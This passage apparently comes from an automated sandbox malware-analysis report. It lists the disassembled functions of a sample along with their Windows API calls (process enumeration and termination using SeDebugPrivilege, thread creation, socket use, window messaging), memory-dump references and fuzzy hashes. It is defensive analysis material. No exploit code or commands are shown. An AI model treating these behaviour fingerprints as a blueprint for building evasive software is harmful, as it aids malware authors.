                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                      • String ID:
                      • API String ID: 2819616528-0
                      • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                      • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                      • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                      • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                      Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                      • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                      • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                      • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                      • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                      • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                      • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                      • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                      • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                      • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                      Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                      • _wcscat.LIBCMT ref: 00486EAD
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      • API String ID: 307300125-78025650
                      • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                      • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                      • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                      • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                      Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                        • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                        • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                      • GetLastError.KERNEL32 ref: 0047E9B7
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                      • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                      • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                      • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                      • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                      • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                      Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                      • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                      • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                      • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                      Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                      • LoadStringW.USER32(00000000), ref: 00464319
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                      • LoadStringW.USER32(00000000), ref: 00464336
                      • _wprintf.LIBCMT ref: 0046435C
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                      • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                      • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                      • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                      Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                      • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                      • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                      • String ID:
                      • API String ID: 1211466189-0
                      • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                      • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                      • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                      • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                      Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                      • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                      • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                      • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                      Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                      • EnterCriticalSection.KERNEL32(?), ref: 00467130
                      • _memmove.LIBCMT ref: 0046717E
                      • _memmove.LIBCMT ref: 0046719B
                      • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      • API String ID: 256516436-0
                      • Opcode ID: 81413540c99eb443fe7a785286661f0ad22942f5f43e8eec7f7fe6ebd1bea792
                      • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                      • Opcode Fuzzy Hash: 81413540c99eb443fe7a785286661f0ad22942f5f43e8eec7f7fe6ebd1bea792
                      • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                      Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 004861EB
                      • GetDC.USER32(00000000), ref: 004861F3
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                      • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                      • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                      • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                      • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                      Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • _wcstok.LIBCMT ref: 0046EC94
                      • _wcscpy.LIBCMT ref: 0046ED23
                      • _memset.LIBCMT ref: 0046ED56
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      • API String ID: 774024439-3081909835
                      • Opcode ID: c2483d142876c2baeab63258c99664eaf323a071444ba6d3dd465cd029a928e8
                      • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                      • Opcode Fuzzy Hash: c2483d142876c2baeab63258c99664eaf323a071444ba6d3dd465cd029a928e8
                      • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                      Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                      Download Yara Rule
                      APIs
                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                      • inet_ntoa.WSOCK32(?), ref: 00476CA7
                        • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                        • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                      • _strlen.LIBCMT ref: 00476D44
                      • _memmove.LIBCMT ref: 00476DAD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                      • String ID:
                      • API String ID: 3619996494-0
                      • Opcode ID: d892f86bd3383f8960cd973da15aebe67d1b25672b6943bea36f920111750447
                      • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                      • Opcode Fuzzy Hash: d892f86bd3383f8960cd973da15aebe67d1b25672b6943bea36f920111750447
                      • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                      Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                      • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                      • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                      • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                      Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                      Download Yara Rule
                      APIs
                      • IsWindow.USER32(00AC3480), ref: 0048B3EB
                      • IsWindowEnabled.USER32(00AC3480), ref: 0048B3F7
                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                      • SendMessageW.USER32(00AC3480,000000B0,?,?), ref: 0048B512
                      • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                      • GetWindowLongW.USER32(00AC3480,000000EC), ref: 0048B571
                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
